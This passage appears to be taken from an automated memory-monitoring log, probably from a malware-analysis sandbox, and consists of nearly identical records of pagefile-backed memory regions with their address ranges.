entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10715 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10716 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10717 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10718 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10719 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10720 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10721 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10722 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10723 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10724 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10725 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10726 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10727 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10728 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10729 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10730 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10731 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10732 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10733 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10734 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10735 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10736 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10737 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10738 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10739 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10740 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10741 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10742 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10743 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10744 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10745 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10746 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10747 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10748 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10749 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10750 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10751 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10752 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10753 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10754 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10755 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10756 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10757 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10758 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10759 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10760 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10761 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10762 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10763 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10764 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10765 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10766 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10767 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10768 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10769 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10770 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10771 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10772 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10773 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10774 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10775 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10776 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10777 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10778 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10779 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10780 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10781 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10782 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10783 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10784 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10785 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10786 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10787 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10788 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10789 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10790 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10791 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10792 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10793 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10794 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10795 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10796 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10797 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10798 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10799 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10800 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10801 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10802 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10803 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10804 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10805 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10806 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10807 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10808 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10809 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10810 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10811 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10812 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10813 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10814 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10815 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10816 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10817 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10818 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10819 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10820 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10821 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10822 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10823 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10824 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10825 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10826 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10827 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10828 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10829 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10830 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10831 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10832 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10833 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10834 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10835 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10836 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10837 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10838 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10839 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10840 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10841 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10842 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10843 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10844 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10845 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10846 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10847 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10848 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10849 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10850 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10851 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10852 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10853 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10854 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10855 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10856 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10857 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10858 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10859 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10860 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10861 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10862 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10863 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10864 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10865 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10866 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10867 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10868 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10869 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10870 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10871 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10872 start_va = 0x44f0000 end_va = 0x44fdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10873 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 10874 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10875 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10876 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10877 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10878 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10879 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10880 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10881 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10882 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10883 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10884 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10885 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10886 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10887 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10888 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10889 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10890 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10891 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044f0000" filename = "" Region: id = 10892 start_va = 0x44f0000 end_va = 0x44f4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 